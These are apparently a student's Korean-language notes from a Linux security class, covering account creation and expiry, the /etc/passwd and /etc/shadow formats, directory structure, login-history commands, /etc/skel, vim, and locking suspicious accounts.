itkorea 인천 아카데미 클라우드 정보보안 수업 자료 및 정리
2024-11-25~2025-05-13
정식 수업~
매주 월화수목금 9시30분-6시30분까지 과정
man useradd
useradd --help
하면 명령어 사용법이나 옵션 등등 다 나옴 친절한 리눅스~!~~
useradd -e 2024/12/31
useradd -e 2024/12/02 korea2
passwd korea2
123456
123456
grep korea2 /etc/passwd /etc/shadow 동시에 열기 ㅋㅋㅋ엌ㅋ
root@R91-01 ~]# grep korea2 /etc/passwd /etc/shadow
/etc/passwd:korea2:x:1018:1018::/home/korea2:/bin/bash
/etc/shadow:korea2:$6$rounds=100000$VPu.yPxmNU8mzcIJ$k7XeABJeJRN2NL1YHaKXHF7VJcSlCURdPjwiVVj69sVUUPLdpsOTtzK9x1FrE020jXhHOBPbTJx.gFVzfzITS.:20060:0:99999:7::20059:
이후 5번터미널에서 로그인하면 expired됐다고 나옴
cat /etc/shadow(암호화파일관리문서)
생성날짜
user1$~~20054
korea2$~~20060:20059(이건 만료됐다는거)
유닉스 1960 1970년1월1일에 공표됨
리눅스는 월력이 아닌 일력이 지남
20054일이 지났다는거임 ㄷㄷ 365 3650 36500
1970년1월1일부터 20060일지났다는게 오늘 2024년12월3일된거임
1970년1월1일부터 20054일지났다는게 오늘 2024년12월3일된거임
user1$~~20054
korea2$~~20060:20059(이건 만료됐다는거:99999(암호사용기간)
99999(300년)암호를 300년 쓸 수 있다는 얘기라는거임
ㅋㅋㅋ이거 이제 별로없으면 이제 암호가 만료된다는거임
[root@R91-01 ~]# grep korea2 /etc/passwd /etc/shadow
/etc/passwd:korea2:x:1018:1018::/home/korea2:/bin/bash
/etc/shadow:korea2:$6$rounds=100000$VPu.yPxmNU8mzcIJ$k7XeABJeJRN2NL1YHaKXHF7VJcSlCURdPjwiVVj69sVUUPLdpsOTtzK9x1FrE020jXhHOBPbTJx.gFVzfzITS.:20060:0:99999:7::20059:
[root@R91-01 ~]# usermod -e 2024/12/04 korea2
[root@R91-01 ~]# grep korea2 /etc/passwd /etc/shadow
/etc/passwd:korea2:x:1018:1018::/home/korea2:/bin/bash
/etc/shadow:korea2:$6$rounds=100000$VPu.yPxmNU8mzcIJ$k7XeABJeJRN2NL1YHaKXHF7VJcSlCURdPjwiVVj69sVUUPLdpsOTtzK9x1FrE020jXhHOBPbTJx.gFVzfzITS.:20060:0:99999:7::20061:
게임 계정이 오늘 만료날인데 계속 쓰는방법? 서버 안나가면 되는데
게임정기점검하는거-->그런 회원들 짜르는거임
-c 는 주석이라 생각하면됨 passwd랑 상관있음
:으로 하나씩 하나씩 구분함 엑셀 행 생각하면됨\
korea2:x:1018:1018::/home/korea2:/bin/bash
필드가 총 7개라 생각하면됨
x는 암호화해서 shadow로 넘긴다는거임
로키9인 1000번부터 계정을 생성하면서 번호 추가
1018번이라는건 로키9에서 18번째 만든 계쩡
1018번은 그룹 아이디임
korea2는 가짜이름
1018::1018이 민증번호라 생각하면됨 진짜 이름!
5번째 비어있는건 총무부 김대리같은 (총무부부서이름넣는데 우린 없어서 비어있는거임)
/home/korea2위치
/bin/bash 로그인 필드 셀
[root@R91-01 ~]# grep korea2 /etc/passwd
korea2:x:1018:1018::/home/korea2:/bin/bash
[root@R91-01 ~]# usermod -c kim korea2
[root@R91-01 ~]# grep korea2 /etc/passwd
korea2:x:1018:1018:kim:/home/korea2:/bin/bash
만약 kim지우고싶어요
요러면 지울수 있져~~
참고로 ''안하고 비워두면 오류뜹니당~
[root@R91-01 ~]# usermod -c '' korea2
[root@R91-01 ~]# grep korea2 /etc/passwd
korea2:x:1018:1018::/home/korea2:/bin/bash
리눅스에서 제일 꼭대기 cd /
ls
[root@R91-01 ~]# cd /
[root@R91-01 /]# ls
afs boot etc lib media opt root sbin sys usr
bin dev home lib64 mnt proc run srv tmp var
1. boot는 부팅할때 쓰는 파일들이 들어가있음
2. etc 환경설정파일들(제일 중요)-->root만 들어갈 수 있음/그래서 etc/shadow파일이 여기에 들어가있는거임
3. root root홈디렉토리임. 루트가 시작하는 계정 디렉토리. 루트로 로그인하면 저기서 시작하는거임
4. home은 user홈디렉토리임. user들이 시작하는 계쩡 디렉토리/root랑 user랑 시작 디렉토리가 달라요
5. dev 하드웨어 정보가 들어가있음
6. bin [binary] 유저도 사용할 수 있는 명령어가 들어가 있는 디텍토리
7.sbin [specialbinary] 루트만 사용할 수 있는 명령어가 들어가 있는 디렉토리
useradd는 대표적으로 sbin에 들어가있음 why? root만 계정 생성가능하거든
8. proc[process] cpu정보 확인하는거임
9. usr var
c드라이브밑에 프로그램 파일들[윈도우운영체제에서 사용자가 프로그램을 설치하면
c드라이브에 설치되는데 그게 리눅스에서 usr이랑 var임]
usr 은 정적 데이터
var 은 동적 데이터
예를 들어) mail은 동적 데이터임. 맨날 다른 메일 받으니까. 정적이 아니라 동적임
log도 그때그때 다르니까 동적 데이터임. 그래서 mail이랑 log도 var로 들어가는거임
4번터미널에서 user11로 로그인하고
cd
pwd
/home/user11
cd /home/suer1 하면 permission denied 내 땅아니라 거부당함
남에 땅에들어가는 방법 딱 하나 걔가 날 초대해줘야함
근데 누가 내땅 허락도 안했는데 들어왔다? 100%해킹임
root
cd
pwd
/root
mkdir 1203
cd 1203
ls
ls -a
. ..라고뜸 아무것도 없다고
mkdir dri1 .dri2 dri3 .dri4 dri5 .dri6
홀수번호는 보이고
짝수번호는 안보임
.넣으면 폴더숨기는 옵션임
[root@R91-01 1203]# mkdir dri1 .dri2 dri3 .dri4 dri5 .dri6
[root@R91-01 1203]# ls
dri1 dri3 dri5
[root@R91-01 1203]# ls -a
. .. .dri2 .dri4 .dri6 dri1 dri3 dri5
[root@R91-01 1203]# cd .dri2
[root@R91-01 .dri2]# pwd
/root/1203/.dri2
그래서 pwd로 항상 위치 확인해야함
파일 만드는건 touch임
폴더는 mkdir
[root@R91-01 .dri2]# pwd
/root/1203/.dri2
[root@R91-01 .dri2]# touch .file1 file2 .file3 file4 .file5 file6
[root@R91-01 .dri2]# ls
file2 file4 file6
[root@R91-01 .dri2]# ls -a
. .. .file1 .file3 .file5 file2 file4 file6
[root@R91-01 .dri2]#
여기서 이제 root폴더로 가고싶다? cd
만약 한칸 뒤로 가고싶다? cd ..
[root@R91-01 .dri2]# cd ..
[root@R91-01 1203]# pwd
/root/1203
폴더를 지우고 싶다? rmdir
[root@R91-01 1203]# ls -a
. .. .dri2 .dri4 .dri6 dri1 dri3 dri5
[root@R91-01 1203]# rmdir .dri4
[root@R91-01 1203]# ls -a
. .. .dri2 .dri6 dri1 dri3 dri5
[root@R91-01 1203]# rmdir dri1 dri3 dri5
[root@R91-01 1203]# ls -a
. .. .dri2 .dri6
[root@R91-01 1203]#
[root@R91-01 1203]# rmdir .dri6
[root@R91-01 1203]# ls -a
. .. .dri2
[root@R91-01 1203]# rmdir .dri2
rmdir: failed to remove '.dri2': 디렉터리가 비어있지 않음
[root@R91-01 1203]#
실천에서는 rmdir을 안씀 왜? 방금 위에 받듯이 안에 내용물이 있으면 명령어를 작동안하니까
번거로우니까. 가용성이 떨어짐. 이런게 있긴함 ㅇㅇ
폴더랑 파일 지우는 명령어 rm
이러면 한번더 물어봄 너 진짜 지울꺼양? yes해야 지워짐
그래서 rm -f하면 force 강제로 ㅋㅋ지움 yes 칠 필요없어짐
-r, -R, --recursive
remove directories and their contents recursively
-r은 폴더 지울때만 하는거임 안에 내용물있어도 상관없음 그래서 rm -rf
mkdir -p
하면 부모 자식 동시에 만드는거임
mkdir -p a/b/c/d/e/f/g/f
하면 챠라라락 가능
아니면 cd로 들어가서 일일히 만들어줘야함
dnf install -y tree는 이 만든걸 확인해주는 명령어임
[root@R91-01 1203]# dnf install -y tree
Rocky Linux 9 - BaseOS 6.7 kB/s | 4.1 kB 00:00
Rocky Linux 9 - AppStream 7.7 kB/s | 4.5 kB 00:00
Rocky Linux 9 - Extras 4.8 kB/s | 2.9 kB 00:00
꾸러미 tree-1.8.0-10.el9.x86_64가 이미 설치되어 있습니다.
종속성이 해결되었습니다.
처리가 필요하지 않습니다.
완료되었습니다!
[root@R91-01 1203]# mkdir -p a/b/c/d/e/f/g/f
[root@R91-01 1203]# tree
.
└── a
└── b
└── c
└── d
└── e
└── f
└── g
└── f
8 directories, 0 files
[root@R91-01 1203]# ls -a
. .. .dri2 a
[root@R91-01 1203]# rm -rf a
[root@R91-01 1203]# ls -a
. .. .dri2
[root@R91-01 1203]# mkdir -p happy/h/a/p/p/y
[root@R91-01 1203]# ls -a
. .. .dri2 happy
[root@R91-01 1203]# tree happy
happy
└── h
└── a
└── p
└── p
└── y
로그인 로그아웃 보는 명령어
w who users last lastlog
w who users last lastlog
이 다섯개로 로그인 기록을 확인 및 추적할 수 있음
[root@R91-01 korea2]# w
10:36:35 up 49 min, 4 users, load average: 0.01, 0.00, 0.00
USER TTY LOGIN@ IDLE JCPU PCPU WHAT
root seat0 09:47 0.00s 0.00s 0.00s /usr/libexec/gdm-wayland-sessio
root tty2 09:47 49:24 0.01s 0.01s /usr/libexec/gnome-session-bina
korea2 tty5 09:48 48:27 0.00s 0.00s -bash
user11 tty4 10:00 33:55 0.04s 0.04s -bash
[root@R91-01 korea2]# who
root seat0 2024-12-03 09:47 (login screen)
root tty2 2024-12-03 09:47 (tty2)
korea2 tty5 2024-12-03 09:48
user11 tty4 2024-12-03 10:00
[root@R91-01 korea2]# users
korea2 root root user11
[root@R91-01 korea2]# last
user11 tty4 Tue Dec 3 10:00 still logged in
korea2 tty5 Tue Dec 3 09:48 still logged in
root tty2 tty2 Tue Dec 3 09:47 still logged in
root seat0 login screen Tue Dec 3 09:47 still logged in
reboot system boot 5.14.0-503.15.1. Tue Dec 3 09:47 still running
root tty2 tty2 Tue Dec 3 09:31 - down (00:15)
root seat0 login screen Tue Dec 3 09:31 - down (00:15)
reboot system boot 5.14.0-503.15.1. Tue Dec 3 09:31 - 09:46 (00:15)
user6 pts/0 ::ffff:192.168.1 Mon Dec 2 13:50 - 13:50 (00:00)
user0 pts/0 ::ffff:192.168.1 Mon Dec 2 11:38 - 11:38 (00:00)
root pts/0 192.168.10.250 Mon Dec 2 11:14 - 11:15 (00:00)
root pts/0 192.168.10.241 Mon Dec 2 10:54 - 10:55 (00:00)
root tty2 tty2 Mon Dec 2 10:54 - crash (22:36)
root seat0 login screen Mon Dec 2 10:54 - crash (22:36)
reboot system boot 5.14.0-427.13.1. Mon Dec 2 10:54 - 09:46 (22:52)
user0 tty2 tty2 Fri Nov 29 09:31 - crash (3+01:22)
user0 seat0 login screen Fri Nov 29 09:31 - crash (3+01:22)
reboot system boot 5.14.0-427.13.1. Fri Nov 29 09:31 - 09:46 (4+00:15)
user0 tty2 tty2 Thu Nov 28 17:39 - crash (15:52)
user0 seat0 login screen Thu Nov 28 17:39 - crash (15:52)
reboot system boot 5.14.0-427.13.1. Thu Nov 28 17:38 - 09:46 (4+16:07)
user0 tty2 tty2 Thu Nov 28 17:35 - crash (00:03)
user0 seat0 login screen Thu Nov 28 17:35 - crash (00:03)
reboot system boot 5.14.0-427.13.1. Thu Nov 28 17:35 - 09:46 (4+16:11)
user0 tty2 tty2 Thu Nov 28 17:31 - crash (00:04)
user0 seat0 login screen Thu Nov 28 17:31 - crash (00:04)
reboot system boot 5.14.0-427.13.1. Thu Nov 28 17:31 - 09:46 (4+16:15)
user0 tty2 tty2 Thu Nov 28 17:20 - crash (00:10)
user0 seat0 login screen Thu Nov 28 17:20 - crash (00:10)
reboot system boot 5.14.0-427.13.1. Thu Nov 28 17:20 - 09:46 (4+16:26)
root tty2 tty2 Thu Nov 28 09:33 - crash (07:46)
root seat0 login screen Thu Nov 28 09:33 - crash (07:46)
reboot system boot 5.14.0-427.13.1. Thu Nov 28 09:24 - 09:46 (5+00:22)
root pts/2 192.168.10.44 Wed Nov 27 13:13 - crash (20:10)
root pts/2 192.168.10.31 Wed Nov 27 13:07 - 13:10 (00:02)
root pts/4 192.168.10.36 Wed Nov 27 13:00 - 13:10 (00:10)
root pts/3 192.168.10.36 Wed Nov 27 12:58 - 13:10 (00:12)
root pts/2 192.168.10.35 Wed Nov 27 12:54 - 13:05 (00:10)
root pts/2 192.168.10.35 Wed Nov 27 12:53 - 12:54 (00:00)
root pts/6 192.168.10.45 Wed Nov 27 12:51 - 12:51 (00:00)
root pts/4 192.168.10.45 Wed Nov 27 12:50 - 12:51 (00:00)
root pts/3 192.168.10.39 Wed Nov 27 12:50 - 12:51 (00:01)
root pts/2 192.168.10.39 Wed Nov 27 12:49 - 12:52 (00:02)
root pts/5 192.168.10.32 Wed Nov 27 12:48 - crash (20:35)
root pts/4 192.168.10.125 Wed Nov 27 12:48 - 12:48 (00:00)
root pts/3 192.168.10.39 Wed Nov 27 12:48 - 12:49 (00:01)
root pts/2 192.168.10.32 Wed Nov 27 12:48 - 12:49 (00:01)
root tty2 tty2 Wed Nov 27 12:47 - crash (20:36)
root seat0 login screen Wed Nov 27 12:47 - crash (20:36)
reboot system boot 5.14.0-427.13.1. Wed Nov 27 12:47 - 09:46 (5+20:59)
reboot system boot 5.14.0-427.13.1. Wed Nov 27 12:46 - 12:47 (00:00)
root pts/1 192.168.10.32 Wed Nov 27 12:45 - 12:45 (00:00)
root pts/4 192.168.10.125 Wed Nov 27 12:44 - 12:45 (00:01)
user0 pts/1 192.168.10.47 Wed Nov 27 12:43 - 12:44 (00:01)
root pts/3 192.168.10.47 Wed Nov 27 12:42 - 12:45 (00:02)
root tty2 tty2 Wed Nov 27 12:41 - down (00:04)
root seat0 login screen Wed Nov 27 12:41 - down (00:04)
root pts/0 192.168.10.125 Wed Nov 27 12:41 - 12:45 (00:04)
reboot system boot 5.14.0-427.13.1. Wed Nov 27 12:41 - 12:45 (00:04)
root pts/4 192.168.10.42 Wed Nov 27 12:40 - 12:40 (00:00)
user0 tty3 Wed Nov 27 12:38 - down (00:02)
root pts/2 192.168.10.125 Wed Nov 27 12:37 - 12:40 (00:03)
root pts/2 192.168.10.125 Wed Nov 27 12:35 - 12:36 (00:00)
root pts/3 192.168.10.125 Wed Nov 27 12:32 - 12:40 (00:08)
root pts/2 192.168.10.33 Wed Nov 27 12:31 - 12:32 (00:00)
root tty2 tty2 Wed Nov 27 12:05 - down (00:35)
root seat0 login screen Wed Nov 27 12:05 - down (00:35)
reboot system boot 5.14.0-427.13.1. Wed Nov 27 12:05 - 12:40 (00:35)
reboot system boot 5.14.0-427.13.1. Wed Nov 27 12:04 - 12:05 (00:00)
reboot system boot 5.14.0-427.13.1. Wed Nov 27 12:02 - 12:03 (00:00)
reboot system boot 5.14.0-427.13.1. Wed Nov 27 12:02 - 12:02 (00:00)
reboot system boot 5.14.0-427.13.1. Wed Nov 27 11:59 - 11:59 (00:00)
reboot system boot 5.14.0-427.13.1. Wed Nov 27 11:53 - 11:54 (00:00)
reboot system boot 5.14.0-427.13.1. Wed Nov 27 11:53 - 11:53 (00:00)
reboot system boot 5.14.0-427.13.1. Wed Nov 27 11:20 - 11:41 (00:20)
root pts/2 192.168.10.33 Wed Nov 27 11:13 - 11:20 (00:06)
root pts/1 192.168.10.125 Wed Nov 27 11:13 - 11:14 (00:00)
root tty2 tty2 Wed Nov 27 10:26 - down (00:53)
root seat0 login screen Wed Nov 27 10:26 - down (00:53)
root pts/3 192.168.10.125 Wed Nov 27 09:55 - 09:56 (00:01)
user0 tty7 tty7 Wed Nov 27 09:53 - down (01:27)
user0 seat0 login screen Wed Nov 27 09:53 - 10:26 (00:33)
user3 pts/0 192.168.10.33 Wed Nov 27 09:49 - 10:20 (00:30)
user9 pts/3 192.168.10.39 Wed Nov 27 09:46 - 09:49 (00:03)
user0 pts/0 192.168.10.33 Wed Nov 27 09:44 - 09:47 (00:02)
user0 pts/3 192.168.10.33 Wed Nov 27 09:42 - 09:45 (00:02)
root pts/0 192.168.10.125 Wed Nov 27 09:41 - 09:43 (00:01)
user0 tty3 Wed Nov 27 09:41 - down (01:39)
user1 pts/0 192.168.10.125 Wed Nov 27 09:40 - 09:41 (00:00)
user1 tty5 tty5 Wed Nov 27 09:40 - 10:20 (00:40)
user1 seat0 login screen Wed Nov 27 09:40 - 09:53 (00:13)
user0 pts/0 192.168.10.32 Wed Nov 27 09:39 - 09:40 (00:00)
user0 pts/0 192.168.10.78 Tue Nov 26 13:17 - 13:23 (00:06)
root tty3 Tue Nov 26 13:04 - 09:41 (20:37)
root pts/1 192.168.10.125 Tue Nov 26 12:56 - 13:02 (00:05)
user0 pts/2 192.168.10.32 Tue Nov 26 12:49 - 12:54 (00:05)
root pts/1 192.168.10.125 Tue Nov 26 12:49 - 12:55 (00:06)
user0 pts/1 192.168.10.32 Tue Nov 26 12:32 - 12:40 (00:07)
root tty4 Tue Nov 26 12:15 - down (23:05)
user0 tty3 Tue Nov 26 12:13 - 12:54 (00:41)
root tty2 tty2 Tue Nov 26 11:19 - 10:26 (23:06)
root seat0 login screen Tue Nov 26 11:19 - 09:40 (22:20)
reboot system boot 5.14.0-427.13.1. Tue Nov 26 11:12 - 11:20 (1+00:07)
wtmp begins Tue Nov 26 11:12:51 2024
[root@R91-01 korea2]# laslog
bash: laslog: 명령을 찾을 수 없습니다...
[root@R91-01 korea2]# lastlog
Username Port From Latest
root pts/0 화 12월 3 10:02:57 +0900 2024
bin **한번도 로그인한 적이 없습니다**
daemon **한번도 로그인한 적이 없습니다**
adm **한번도 로그인한 적이 없습니다**
lp **한번도 로그인한 적이 없습니다**
sync **한번도 로그인한 적이 없습니다**
shutdown **한번도 로그인한 적이 없습니다**
halt **한번도 로그인한 적이 없습니다**
mail **한번도 로그인한 적이 없습니다**
operator **한번도 로그인한 적이 없습니다**
games **한번도 로그인한 적이 없습니다**
ftp **한번도 로그인한 적이 없습니다**
nobody **한번도 로그인한 적이 없습니다**
systemd-coredump **한번도 로그인한 적이 없습니다**
dbus **한번도 로그인한 적이 없습니다**
polkitd **한번도 로그인한 적이 없습니다**
avahi **한번도 로그인한 적이 없습니다**
rtkit **한번도 로그인한 적이 없습니다**
pipewire **한번도 로그인한 적이 없습니다**
sssd **한번도 로그인한 적이 없습니다**
libstoragemgmt **한번도 로그인한 적이 없습니다**
tss **한번도 로그인한 적이 없습니다**
geoclue **한번도 로그인한 적이 없습니다**
cockpit-ws **한번도 로그인한 적이 없습니다**
cockpit-wsinstance **한번도 로그인한 적이 없습니다**
flatpak **한번도 로그인한 적이 없습니다**
colord **한번도 로그인한 적이 없습니다**
clevis **한번도 로그인한 적이 없습니다**
setroubleshoot **한번도 로그인한 적이 없습니다**
gdm tty1 화 12월 3 09:47:13 +0900 2024
pesign **한번도 로그인한 적이 없습니다**
gnome-initial-setup **한번도 로그인한 적이 없습니다**
sshd **한번도 로그인한 적이 없습니다**
chrony **한번도 로그인한 적이 없습니다**
dnsmasq **한번도 로그인한 적이 없습니다**
tcpdump **한번도 로그인한 적이 없습니다**
user0 pts/0 ::ffff:192.168.10.56 월 12월 2 11:38:15 +0900 2024
user1 pts/0 목 11월 28 17:43:13 +0900 2024
user2 **한번도 로그인한 적이 없습니다**
user3 **한번도 로그인한 적이 없습니다**
user4 **한번도 로그인한 적이 없습니다**
user5 **한번도 로그인한 적이 없습니다**
user6 pts/0 ::ffff:192.168.10.36 월 12월 2 13:50:30 +0900 2024
user7 pts/0 수 11월 27 13:14:44 +0900 2024
user8 **한번도 로그인한 적이 없습니다**
user9 **한번도 로그인한 적이 없습니다**
user10 **한번도 로그인한 적이 없습니다**
user11 pts/0 화 12월 3 10:02:24 +0900 2024
user12 **한번도 로그인한 적이 없습니다**
user13 **한번도 로그인한 적이 없습니다**
user14 **한번도 로그인한 적이 없습니다**
user15 **한번도 로그인한 적이 없습니다**
user16 **한번도 로그인한 적이 없습니다**
user17 **한번도 로그인한 적이 없습니다**
stapunpriv **한번도 로그인한 적이 없습니다**
korea2 tty5 화 12월 3 09:48:09 +0900 2024
[root@R91-01 korea2]# -----
useradd korea4
passwd korea4
123456 123456
ls -a /home/korea4
. .. .bash_logout .bash_profile .bashrc .mozilla
skel은 복사하는거임 계정 정보들
.bash_logout 로그아웃후 실행할 것
.bash_profile 로그인 전에 실행할 것
.bashrc 로그인 후 실행할 것
.mozilla 인터넷 기록이랑 관련된거
계정 만들면 알아서 얘네들이 생성됨
이게 무슨뜻이냐
[root@R91-01 korea3]# cd /etc/skel
[root@R91-01 skel]# ls -a
. .. .bash_logout .bash_profile .bashrc .mozilla
[root@R91-01 skel]# mkdir test
[root@R91-01 skel]# cat > 1.txt
linux[root@R91-01 skel]#
cat > 1.txt 한다음 ctrl + d 하면 작성완료후 저장 후 끄기
만들어놓은 계정에 적용되고
이후 만든것들은 계정에 적용안됨
skel파일을 역할은 업무랑 관련된 파일이 있으면 넣어두고
꼭 skel 파일을 안쓰고 작업폴더가 있으면 그걸 usermod옵션으로
바꿔서 써도됨
skel은 -k 옵션임 -k 하고[폴더지정]하면 다한번에 복사가됨
편리 편리
skel 계정생성할때, 바로 시작하자마자 가지고있어라 그런 기본 옵션들 가지고 있는 파일
[root@R91-01 korea2]# useradd korea3
[root@R91-01 korea2]# passwd korea3
korea3 사용자의 비밀 번호 변경 중
새 암호:
새 암호 재입력:
passwd: 모든 인증 토큰이 성공적으로 업데이트 되었습니다.
[root@R91-01 korea2]#
[root@R91-01 korea2]# cd /home/korea3
[root@R91-01 korea3]# ls
[root@R91-01 korea3]# ls -a
. .. .bash_logout .bash_profile .bashrc .mozilla
[root@R91-01 korea3]# useradd korea4
[root@R91-01 korea3]# passwd korea4
korea4 사용자의 비밀 번호 변경 중
새 암호:
새 암호 재입력:
죄송합니다. 암호가 일치하지 않습니다.
passwd: 인증 토근 수정 오류
[root@R91-01 korea3]#
[root@R91-01 korea3]# passwd korea4
korea4 사용자의 비밀 번호 변경 중
새 암호:
새 암호 재입력:
passwd: 모든 인증 토큰이 성공적으로 업데이트 되었습니다.
[root@R91-01 korea3]# ls
[root@R91-01 korea3]# ls -a
. .. .bash_logout .bash_profile .bashrc .mozilla
[root@R91-01 korea3]# ls -a /home/korea4
. .. .bash_logout .bash_profile .bashrc .mozilla
[root@R91-01 korea3]# cd /etc/skel
[root@R91-01 skel]# ls -a
. .. .bash_logout .bash_profile .bashrc .mozilla
[root@R91-01 skel]# mkdir test
[root@R91-01 skel]# cat > 1.txt
linux[root@R91-01 skel]# ls -a
. .. .bash_logout .bash_profile .bashrc .mozilla 1.txt test
[root@R91-01 skel]# cd /home/korea3
[root@R91-01 korea3]# ls -a
. .. .bash_logout .bash_profile .bashrc .mozilla
[root@R91-01 korea3]# ls -a /etc/skel
. .. .bash_logout .bash_profile .bashrc .mozilla 1.txt test
[root@R91-01 korea3]# useradd korea6
[root@R91-01 korea3]# ls -a /home/korea6
. .. .bash_logout .bash_profile .bashrc .mozilla 1.txt test
korea4랑 korea3는 이미 생성된거고 이후 skel에서 mkdir test 파일이랑 디렉토리 만듬
그리고 나서 보니까 skel에 생성되어있음
korea3랑 korea4에는 cd /home/korea3보면 test가 없음!
korea6새로 생성 후 ls -a /home/korea6하면 test가 있음! 왜? skel에서 세팅을 한 후
그 세팅이 새로 생긴 계정 korea6에 반영되었기때문
[root@R91-01 korea3]# pwd
/home/korea3
[root@R91-01 korea3]# cd /etc/skel
[root@R91-01 skel]# pwd
/etc/skel
[root@R91-01 skel]# ls -a
. .. .bash_logout .bash_profile .bashrc .mozilla 1.txt test
[root@R91-01 skel]# rm -rf test 1.txt
[root@R91-01 skel]# ls -a
. .. .bash_logout .bash_profile .bashrc .mozilla
지우깅~text 1.txt 파일 필요없으니까 rm -rf 명령어 force remove
만약 -r을 안붙이고 지웠어! 그러면 똑같은 계정 만들고 다시 -r붙이고 지워두면됨
그 계정안에 정보가 그대로 있을테니까
nano를 써도되는데 vim이 편해요 ㅎㅎ
이제 vi대신에 vim을 쓰면됩니다
vim /etc/default/useradd
메모장 파일 여는거임
6개 키
우린 소문자 i 기억하기
i누르면 수정모드 들어감 끼워넣기라는게 생김i가 수정하겠다는거임
esc이후 누르면 입력모드가 사라짐 이러면 수정을 못함!!
VIM종료는 반드시 명령모드에서 할 수 있음
shift 콜론하고 q! 저장후 종료는 wq! !는 강제 종료
뭔가 에러가있엇허 잘 안되면 ! 붙이는거임
#useradd defaults file
GROUP=100
HOME=/home
INACTIVE=-1
EXPIRE=
SHELL=/bin/bash
SKEL=/etc/skel
CREATE_MAIL_SPOOL=yes
home은 디렉토리 설정
inactive=-1뜻은
사용자의 비활성 상태(로그인 비활성화)로 전환되기 전까지 비밀번호가 만료된 후 허용되는 일수를 지정합니다.
기본값:
-1은 비활성화 기간을 설정하지 않음을 의미합니다.
예시:
양수 값으로 설정하면 비밀번호가 만료된 후 사용자가 해당 기간 동안 새 비밀번호를 설정하지 않으면 계정이 비활성화됩니다.
expire은 만료일 [30쓰면 30일쓰는거임]
shell 바이너리밑에 bash쓰는거임. 리눅스는 대소문자 구분합니다
shell이 한 50개있다고요 그래서 /bin/bash셀이 가장 무난한 셀이에요
skell폴더는 /etc/skel에서 복사해왕
creat_mail_spool 메일 관련 만들꺼라는 뜻
명령모드에서 가능함
여긴 ctrl z가 없음 대신에 u누르면 됨
dd는 한줄 지우기
esc !qa강제저장
지금부터 작업할때는 무조건 백업파일 복사해놓고하기
그럼 걱정이 없음. 현장나가서도 마찬가지
그래서 작업하다가 문제생기면 돌려서하기
항상 작업하라고하면 pwd해서 /root하고 거기서 오늘 작업한 폴더만들고
거기서 작업하면 거기 기록되어있음 매일매일 그렇게 하기
#useradd defaults file
GROUP=100
HOME=/home
INACTIVE=-1
EXPIRE=
SHELL=/bin/bash
SKEL=/etc/skel
CREATE_MAIL_SPOOL=yes
이거 하나하나 문장 설명해줄래?
이 파일은 useradd 명령의 기본 설정을 정의하는 설정 파일로, 사용자가 useradd 명령을 실행할 때 명시적으로 옵션을 제공하지 않으면 여기에 정의된 값이 기본값으로 사용됩니다. 각 항목을 하나씩 설명하겠습니다.
1. GROUP=100
- 설명:
- 사용자가 생성될 때 기본으로 지정될 그룹 ID(GID)를 나타냅니다.
- 기본 동작:
- 새로 추가된 사용자는 이 GID에 속한 그룹에 포함됩니다.
- 참고:
- GID 100은 일반적으로 users 그룹에 해당합니다(대부분의 Linux 배포판에서 기본값).
2. HOME=/home
- 설명:
- 새 사용자의 홈 디렉토리가 생성될 기본 경로를 지정합니다.
- 예시:
- 사용자를 useradd john 명령으로 추가하면 홈 디렉토리는 /home/john으로 생성됩니다.
- 참고:
- 사용자가 별도의 -d 옵션으로 경로를 지정하지 않으면 이 경로를 기반으로 생성됩니다.
3. INACTIVE=-1
- 설명:
- 사용자의 비활성 상태(로그인 비활성화)로 전환되기 전까지 비밀번호가 만료된 후 허용되는 일수를 지정합니다.
- 기본값:
- -1은 비활성화 기간을 설정하지 않음을 의미합니다.
- 예시:
- 양수 값으로 설정하면 비밀번호가 만료된 후 사용자가 해당 기간 동안 새 비밀번호를 설정하지 않으면 계정이 비활성화됩니다.
4. EXPIRE=
- 설명:
- 계정의 만료 날짜를 지정합니다.
- 기본값:
- 빈 값(EXPIRE=)은 계정이 만료되지 않음을 의미합니다.
- 형식:
- 날짜 형식은 YYYY-MM-DD입니다.
- 예시:
EXPIRE=2024-12-31- 이 경우, 계정은 2024년 12월 31일 이후 비활성화됩니다.
5. SHELL=/bin/bash
- 설명:
- 사용자가 로그인 시 기본적으로 사용할 쉘을 지정합니다.
- 기본값:
- /bin/bash는 대다수 Linux 시스템에서 기본적으로 제공되는 쉘입니다.
- 참고:
- 다른 쉘로 변경하고 싶다면 /etc/shells 파일에 나열된 쉘 경로 중 하나를 지정해야 합니다.
- 예시:
- SHELL=/bin/zsh로 설정하면 새 사용자에게 기본적으로 Zsh를 제공합니다.
6. SKEL=/etc/skel
- 설명:
- 새 사용자의 홈 디렉토리 생성 시 기본 파일 및 디렉토리 구조를 제공하는 템플릿 경로를 지정합니다.
- 작동 방식:
- /etc/skel 디렉토리 안에 있는 파일과 디렉토리가 새 사용자의 홈 디렉토리에 복사됩니다.
- 예시:
- /etc/skel에 .bashrc 파일이 있다면, 새 사용자의 홈 디렉토리에 자동으로 .bashrc가 복사됩니다.
7. CREATE_MAIL_SPOOL=yes
- 설명:
- 새 사용자의 **메일 스풀(mail spool)**을 생성할지를 결정합니다.
- 메일 스풀은 /var/spool/mail/<username>에 생성되는 파일로, 사용자의 이메일 저장소 역할을 합니다.
- 옵션:
- yes: 사용자를 추가할 때 메일 스풀 파일을 생성합니다.
- no: 메일 스풀 파일을 생성하지 않습니다.
요약
이 설정 파일은 useradd 명령의 기본값을 정의하며, 사용자가 생성될 때의 주요 속성을 지정합니다. 이를 통해 새 계정이 생성될 때 일관된 디렉토리 구조, 쉘, 만료 정책 등을 자동으로 적용할 수 있습니다. 필요에 따라 이 값을 수정하여 시스템 환경에 맞게 사용자 생성 방식을 커스터마이징할 수 있습니다.
lock 실습
만약 w 해서 확인했는데 해킹 계정이있어 그럼 lock 걸어야함
passwd [옵션] [사용자계정]
-l 락하는거
-u 하면 언락하는거임
passwd -l user3 하면 유진씨가 못들어감
만약 해킹 계정 들어왔는데 절!대! 계정 삭제하면 안되고 일단 락 걸어두고
계정 로그나 히스토리 확인해야함
그리고 만약에 내가 만약에 어라 해킹 계정아니었네;;ㅈㅅㅎㅎ;;언락해줌 ㅎㅎ
id 확인하는거
[root@R91-01 skel]# cd
[root@R91-01 ~]# cd 1203
[root@R91-01 1203]# pwd
/root/1203
[root@R91-01 1203]# ls
happy
[root@R91-01 1203]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
root는 0번이에요. 루트이외에 0번 가지고있으면 다 해킹이라는뜻
[해킹실습]
